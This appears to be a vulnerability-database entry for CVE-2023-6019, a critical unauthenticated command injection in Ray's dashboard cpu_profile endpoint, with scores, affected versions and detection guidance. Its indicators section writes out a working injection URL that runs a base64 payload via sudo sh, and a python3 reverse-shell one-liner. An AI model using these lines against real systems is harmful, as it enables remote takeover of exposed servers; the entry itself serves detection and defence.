cbcvebase.
CVE-2023-6019
published 2023-11-16

CVE-2023-6019: A command injection existed in Ray's cpu_profile URL parameter allowing attackers to execute os commands on the system running the ray dashboard remotely…

PriorityP183critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
74.63%
99.4th percentile
A command injection existed in Ray's cpu_profile URL parameter allowing attackers to execute os commands on the system running the ray dashboard remotely without authentication. The issue is fixed in version 2.8.1+. Ray maintainers' response can be found here: https://www.anyscale.com/blog/update-on-ray-cves-cve-2023-6019-cve-2023-6020-cve-2023-6021-cve-2023-48022-cve-2023-48023

Affected

2 ranges
VendorProductVersion rangeFixed in
anyscaleray>= 0 < 2.8.12.8.1
ray-projectray-project_rayunspecified – latest

Detection & IOCsextracted from sources · hover to see the quote

url/worker/cpu_profile?pid=3354&ip=<ip>&duration=5&native=0&format=`echo <b64_payload> |base64$IFS-d|sudo%20sh`
path/worker/cpu_profile
commandpython3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((<lhost>,<lport>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
  • Monitor HTTP GET requests to the Ray Dashboard endpoint /worker/cpu_profile containing backtick characters or shell metacharacters (e.g., $IFS, base64, sudo) in the `format` query parameter, which indicates command injection exploitation.
  • The exploit encodes the reverse shell payload in base64 and injects it via the `format` parameter using backtick command substitution and $IFS to bypass space filtering; detect base64-encoded strings in the `format` URL parameter of requests to /worker/cpu_profile.
  • Detect unauthenticated GET requests to the Ray Dashboard (default port 8265) targeting /worker/cpu_profile — the endpoint requires no authentication and is directly exploitable remotely.
  • Hunt for reverse shell patterns spawned from the Ray dashboard process, specifically python3 socket-based reverse shells using pty.spawn('/bin/bash'), as these are the payload delivered post-exploitation.
  • ·The Ray Dashboard binds to 0.0.0.0 by default, exposing it publicly if not restricted by firewall rules; Anyscale's own guidance recommends operating Ray within a strictly controlled network environment.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vendor_redhat9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.